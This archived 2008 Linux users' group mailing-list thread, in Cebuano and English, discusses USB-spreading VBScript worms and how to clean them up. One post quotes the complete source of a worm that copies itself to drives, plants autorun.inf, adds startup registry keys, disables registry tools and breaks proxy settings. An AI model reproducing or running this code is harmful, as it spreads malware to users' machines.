paka ulaw lang. message ra gibayloan tapos butangan pa jud taga cdoc ??? d nako matakdan ani na klase na virus, disable nako tanan autorun. my pc was once infected with that TTMS NAA NA DIRI, DON'T WORRY I'M NOT A CORRUPT LIKE YOU worm which made me decide to disable all autoruns.
http://www.tildemark.com/tips/disable-autorun-on-cdrom-or-usb-drives.html On Feb 13, 2008 7:59 AM, Nino Rey <[EMAIL PROTECTED]> wrote: > Guys unsa na antivirus sa market ang makadetect na aning isetup ug > transmit.exe (black pegasus) na variant? Samok man gud danhi sa office > namo halos tanan na maapektuhan... Ang worst pa jud is pag adto ka sa M$ > word, then click any of the menus, iya iclose ang tanan apps including > explorer.exe den mu balik sa sinugdanan... > Im still trying to push linux into the environment... gakahadlok pa ang > mga tao danhi sa OS, pero Im on the process of influencing them hehehe.... > > > On 02 13, 08, at 1:01 AM, hard wyrd wrote: > > The "scandal variant" of this script also generates [PEGASUS].TXT on some > systems which contains "BLACK PEGASUS" Hacking Team from Agusan del Sur. And > also mentions that he/she/they come from STI in Agusan. > > That just confirms how prevalent this script is and is being exchanged in > the underground too frequently. > > On Feb 12, 2008 10:47 PM, Camilo III Lozano <[EMAIL PROTECTED]> wrote: > > > sa ako nabaw-an.. taga Quezon, Manila gahimo sa TTMS... > > > > which is arch is right.. ang original kay... > > > > rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet > > Explorer\Main\Window Title", "I AM NOT A CORRUPT LIKE YOU" > > > > hmmm... naa pod Funny UST scandal thingy ani... daghan man... mao mani > > uso karon... scripts na pangsinamok lang sa computer, pakamang sa computer > > na di ma detect sa anti-virus... mostly kay VB.... > > > > list ani nila sa akong na encounter sa XU internet lab kay... > > > > autorun.* > > TTM*.* > > Desktop.* > > imgkulot*.* > > RECYCLER\INFO.exe > > RECYCLER\RECYCLER.exe > > RECYCLER\Desktop.ini > > sysdll.exe > > krag.exe > > > > > > RavMon*.* > > msv*.dll > > scvhosts.exe > > scvhost.exe > > svhost.exe > > C:\Windows\svhost.exe > > C:\Windows\svhost32.exe > > "New Folder".exe > > "Funny UST Scandal.avi.exe" > > smss.exe > > jay.exe > > transmit.exe > > > > isetup.exe > > > > > > most sila ga kalat kay sa flashdisk... naka hidden files, system files > > and read-only files.... > > > > then time to time.. ga usab ila name.. then ga improve ila pag kamang... > > last worst encounter nako kay even imo na gi safe mode, nag dagan gihapon > > sya... balig naka system na sya... even imo na gi delete sa regedit kay naa > > gihapon sya... msconfig, naa gihapon. ang last nako gibuhat kay gi delete > > nako ang mga RECYCLER sa tanan drive nako.. kay didto man sila diay gatago.. > > hehehehehe... so solve na dayun.. :) > > > > amen... > > > > =================================== > > > > On 2/12/08, Ron Michael Khu <[EMAIL PROTECTED]> wrote: > > > > > Obviously this is offtopic, since the guy's script can only > > > run in an OS which supports regedit.exe, wscript.exe and the > > > other MS-apps. > > > > > > Choi gihapon ni iyang gibuhat... mo traverse sa tanan flashdrives > > > and then copy itself to them :D > > > > > > pretty harmless compared to the other naught scripts but nonetheless > > > still annoying :D > > > > > > > > > "DOHHGS Ni TAGA CDOC" > > > > > > Who wants to claim ownership for this script? > > > :D > > > > > > any takers? > > > > > > > > > --------------------------------------------------------------------------------------- > > > 'THIS IS A MODIFIED VERSION BY: TTMS > > > 'PROUD TO BE FILIPINO, NOT TO CORRUPTION! > > > > > > On Error Resume Next > > > > > > Dim mydate, myvbsalias, myvbsfile, mysource, winpath, winsyspath, > > > flashdrive, fs, mycmdfile, cmd, atr, tf, rg, nt, check, sd > > > > > > mycmdfile = "cmd.exe" > > > > > > mydate = month(now()) & day(now()) > > > myvbsalias = "TTMS" & mydate > > > myvbsfile = myvbsalias & ".dll.vbs" > > > > > > atr = "[autorun]" & vbCrLf & _ > > > "shellexecute=wscript.exe " & myvbsfile > > > > > > Set fs = CreateObject("Scripting.FileSystemObject") > > > > > > Dim mf, text, size > > > > > > Set mf = fs.GetFile(WScript.ScriptFullname) > > > > > > size = mf.size > > > check = mf.Drive.drivetype > > > > > > Set text = mf.openastextstream(1, -2) > > > > > > Do While Not text.atendofstream > > > mysource = mysource & text.readline > > > mysource = mysource & vbCrLf > > > Loop > > > > > > Do > > > Set winpath = fs.GetSpecialFolder(0) > > > > > > Set tf = fs.GetFile(winpath & "\" & myvbsfile) > > > > > > tf.Attributes = 32 > > > > > > Set tf = fs.CreateTextFile(winpath & "\" & myvbsfile, 2, True) > > > > > > tf.Write mysource > > > tf.Close > > > > > > Set tf = fs.GetFile(winpath & "\" & myvbsfile) > > > > > > tf.Attributes = 39 > > > > > > If (mydate = "318") Then > > > Set winsyspath = fs.GetSpecialFolder(1) > > > > > > cmd = "@echo off" & vbCrLf & _ > > > "wscript " & winpath & "\" & myvbsfile > > > > > > Set tf = fs.GetFile(winsyspath & "\" & mycmdfile) > > > > > > tf.Attributes = 32 > > > > > > Set tf = fs.CreateTextFile(winsyspath & "\" & mycmdfile, 2) > > > > > > tf.Write cmd > > > tf.Close > > > > > > rg.RegWrite > > > "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet > > > Settings\ProxyEnable", 1, "REG_DWORD" > > > rg.RegWrite > > > "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet > > > Settings\ProxyServer", "0.0.0.0:80" > > > > > > rg.RegWrite > > > "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet > > > Explorer\Control > > > Panel\Connection Settings\Connwiz Admin Lock", 1, "REG_DWORD" > > > End If > > > > > > For Each flashdrive In fs.drives > > > If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And > > > flashdrive.Path <> "A:" Then > > > Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile) > > > > > > tf.Attributes = 32 > > > > > > Set tf = fs.CreateTextFile(flashdrive.Path & "\" & myvbsfile, > > > 2, True) > > > > > > tf.Write mysource > > > tf.Close > > > > > > Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile) > > > > > > tf.Attributes = 39 > > > > > > Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf") > > > > > > tf.Attributes = 32 > > > > > > Set tf = fs.CreateTextFile(flashdrive.Path & "\autorun.inf", > > > 2, > > > True) > > > > > > tf.Write atr > > > tf.Close > > > > > > Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf") > > > > > > tf.Attributes = 39 > > > End If > > > Next > > > > > > Set rg = CreateObject("WScript.Shell") > > > > > > rg.RegWrite > > > > > > "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", > > > 1, "REG_DWORD" > > > > > > rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet > > > Explorer\Main\Window Title", "DOHHGS Ni TAGA CDOC WARNING GUBA NA IMO > > > PC" > > > > > > rg.RegWrite > > > > > > "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\MSConfig", > > > winpath & "\" & myvbsfile > > > rg.RegWrite > > > > > > "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSConfig", > > > winpath & "\" & myvbsfile > > > > > > > > > If check <> 1 Then > > > WScript.sleep 200000 > > > End If > > > > > > Loop While (check <> 1) > > > > > > Set sd = CreateObject("WScript.Shell") > > > > > > sd.run winpath & "\explorer.exe /e,/select, " & WScript.ScriptFullname > > > > > > _________________________________________________ > > > Kagay-Anon Linux Users' Group (KLUG) Mailing List > > > [email protected] (http://cdo.linux.org.ph) > > > Searchable Archives: http://archives.free.net.ph > > > > > > > > > > > -- > > -------------------- > > http://www.metacatalyst.com > > http://www.metacatalyst.org > > http://www.zabyer.org > > > > Got my Own Hacker Key: > > v3sw3BHhw5ln2pr5OFPck3ma2u4MLw5XVm+5l5UCi5Ne4t3b5en5g5RaIs5MSr3p2 > > http://www.hackerkey.com > > > > Registered Linux User: #439468 > > _________________________________________________ > > Kagay-Anon Linux Users' Group (KLUG) Mailing List > > [email protected] (http://cdo.linux.org.ph) > > Searchable Archives: http://archives.free.net.ph > > > > > > -- > "A dog that has no bite, barks loudest." > Registered Linux User #400165 > http://baudizm.blogsome.com > http://www.bayanihanbooks.com > Full-Disclosure,LARTC,Open-ITLUG, PRUG, KLUG, linuxusersgroup, > sybase.public.ase.linux_________________________________________________ > Kagay-Anon Linux Users' Group (KLUG) Mailing List > [email protected] (http://cdo.linux.org.ph) > Searchable Archives: http://archives.free.net.ph > > > > _________________________________________________ > Kagay-Anon Linux Users' Group (KLUG) Mailing List > [email protected] (http://cdo.linux.org.ph) > Searchable Archives: http://archives.free.net.ph > -- How many people can read hex if only you and dead people can read hex? - http://www.tildemark.com/
_________________________________________________ Kagay-Anon Linux Users' Group (KLUG) Mailing List [email protected] (http://cdo.linux.org.ph) Searchable Archives: http://archives.free.net.ph
